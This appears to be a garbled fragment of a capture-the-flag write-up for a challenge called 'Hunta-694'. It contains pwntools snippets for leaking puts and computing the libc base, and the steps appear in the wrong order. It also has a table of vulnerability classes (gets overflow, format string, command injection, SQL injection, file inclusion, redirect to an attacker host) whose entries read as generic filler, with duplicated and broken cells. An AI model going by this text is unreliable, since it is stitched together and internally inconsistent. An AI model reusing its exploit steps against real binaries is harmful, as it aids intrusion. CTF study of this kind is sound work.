Hunta-694 ((new)) [PC]

# ---- Step 2: Compute libc base ------------------------------------ libc = ELF('<path_to_libc.so.6>') # provided or from system libc.address = leaked_puts - libc.symbols['puts'] log.info(f'Libc base: hex(libc.address)')

# Receive and parse leak leaked_puts = u64(io.recvline().strip().ljust(8, b'\x00')) log.success(f'Leaked puts@GLIBC: hex(leaked_puts)') hunta-694

| Category | Typical Indicator | How it manifested in hunta‑694 | |----------|-------------------|-------------------------------| | | gets , strcpy , unchecked read / recv | e.g., gets(buf) in vuln() | | Format string | printf(user_input) | e.g., printf(user_input); | | Use‑after‑free / Double free | free(ptr); … free(ptr); | Observed in heap manipulation | | Integer overflow | malloc(size * elem) without checks | Triggered by large input | | Command injection | system(user_input) | Allows arbitrary shell | | SQL / NoSQL injection | Direct string concatenation in query | SELECT * FROM users WHERE name=' + input | | Crypto weakness | Small RSA modulus, fixed IV, ECB mode | RSA modulus 256‑bit | | Logic flaw | Bypass authentication via magic value | Accepts "admin" after certain condition | | File inclusion | include($_GET['page']) | Remote file inclusion (RFI) | | Web‑specific | Missing CSRF tokens, open redirects | Redirect to http://attacker/... | unchecked read / recv | e.g.